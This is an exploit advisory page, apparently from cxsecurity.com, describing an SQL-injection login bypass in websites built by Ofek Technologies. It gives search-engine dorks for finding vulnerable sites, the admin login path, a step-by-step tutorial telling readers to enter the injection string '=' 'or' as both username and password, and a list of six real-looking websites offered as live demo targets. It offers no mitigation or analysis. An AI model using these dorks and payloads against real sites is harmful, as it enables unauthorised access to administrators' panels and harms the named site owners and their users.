Ofek Technologies Admin Login bypass

Published
Credit
Risk
2017.04.29
magelang1337
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes
Dork: "Powered by Ofek Technologies"

======================================================
# Exploit Title: Ofek Technologies Admin Login bypass
# Dorks 1 : "Powered by Ofek Technologies"
# Dorks 2 : "Designed By Ofek Technologies"
# Date: 2017-04-29
# Author: Magelang1337
# Vendor : http://www.ofek.co.in
# Tested on: win 10
======================================================
Tutorial :

[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: '=' 'or'
[+] Password: '=' 'or'
======================================================
Admin Page : sitetarget.com/index.php/admin/login.html
======================================================
Demo :
http://www.globalhotelsforsale.com/
http://www.nairswedding.in/
http://www.geovinsolutions.com/
http://www.sja.org.in
http://www.syaa.in
http://www.se7en.co.in/

======================================================
Thanks : | nginxDEX - Vcry - Kerens_id - StuxN3t - Codename - CowoKerensTeam - trenggalek6etar - XaiSyndicate -indoXploit |

References:

www.magelang1337.com


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com